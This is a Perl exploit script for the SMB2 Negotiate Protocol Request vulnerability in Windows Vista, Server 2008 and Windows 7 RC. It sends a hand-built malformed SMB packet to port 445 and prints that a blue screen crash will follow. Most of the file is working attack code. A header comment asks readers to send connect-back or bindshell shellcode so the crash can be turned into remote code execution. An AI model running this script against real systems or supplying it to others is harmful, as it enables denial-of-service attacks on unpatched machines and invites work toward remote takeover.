#!/usr/bin/perl

# Windows Vista/7 SMB2.0 Negotiate Protocol Request Remote BSOD Vuln 
# Bug found by Laurent Gaffié
#
# Description: Unfortunatly this SMB2 security issue is specificaly due to a MS patch, for another SMB2.0 security issue:
# KB942624 (MS07-063)
# Installing only this specific update on Vista SP0 create the following issue:
# SRV2.SYS fails to handle malformed SMB headers for the NEGOTIATE PROTOCOL REQUEST functionnality.
# The NEGOTIATE PROTOCOL REQUEST is the first SMB query a client send to a SMB server, and it's used to identify the SMB # dialect that will be used for futher communication.
#
# System affected: Windows Vista All (64b/32b|SP1/SP2 fully updated), Win Server 2008 < R2, Windows 7 RC.
# 
# Ruben Santamarta said: 
#
# "...esta vulnerabilidad SÍ PERMITE la ejecución de código remótamente, al igual que abre la posibilidad para escalar privilegios en local. Hay que aclarar que por el momento la ejecución de código dista mucho de ser reliable al igual que la escalada de privilegios. Pero no hay que considerar como un mero DoS esta vulnerabilidad porque tiene el potencial de convertirse en ejecución de código controlado.
#
# Anyone knows how to find a pointer to gain and control remote host?  Connect back or bindshell shellcode are welcome!
# Please contact me, oscarbm at gmail dot com
# 
# Coded by Oscar Marques aka F-117.
# www.dunkelheit.com.br
# 19/10/09.

my $VERSAO = '0.1';

$SIG{'INT'} = 'IGNORE';
$SIG{'HUP'} = 'IGNORE';
$SIG{'TERM'} = 'IGNORE';
$SIG{'CHLD'} = 'IGNORE';
$SIG{'PS'} = 'IGNORE';

$hostname = "127.0.0.1";

sub banner {
print ("\x57\x69\x6e\x64\x6f\x77\x73\x20\x56\x69\x73\x74\x61\x2f\x37\x20\x53\x4d\x42\x32\x2e\x30\x20\x4e\x65\x67\x6f\x74\x69\x61\x74\x65\x20\x50\x72\x6f\x74\x6f\x63\x6f\x6c\x20\x52\x65\x71\x75\x65\x73\x74\x20\x52\x65\x6d\x6f\x74\x65\x20\x42\x53\x4f\x44\x20\x56\x75\x6c\x6e\x2e\n\x43\x6f\x64\x65\x64\x20\x62\x79\x20\x46\x2d\x31\x31\x37\x2e\n\n");
}

$buffer="\x00\x00\x00\x90". # Begin SMB header: Session message
"\xff\x53\x4d\x42". # Server Component: SMB
"\x72\x00\x00\x00". # Negociate Protocol
"\x00\x18\x53\xc8". # Operation 0x18 & sub 0xc853
"\x00\x26". # Process ID High: --> :) normal value should be "\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe".
"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54".
"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31".
"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00".
"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57".
"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61".
"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c".
"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c".
"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e".
"\x30\x30\x32\x00";

banner();

use IO::Socket;
my $sock = new IO::Socket::INET (
PeerAddr => $hostname,
PeerPort => '445',
Proto => 'tcp',
);
die "[x] Error: $!\n" unless $sock;
print $sock $buffer;
print ("[+] $hostname was attacked. Now BSoD will appear...\n\n");
close($sock);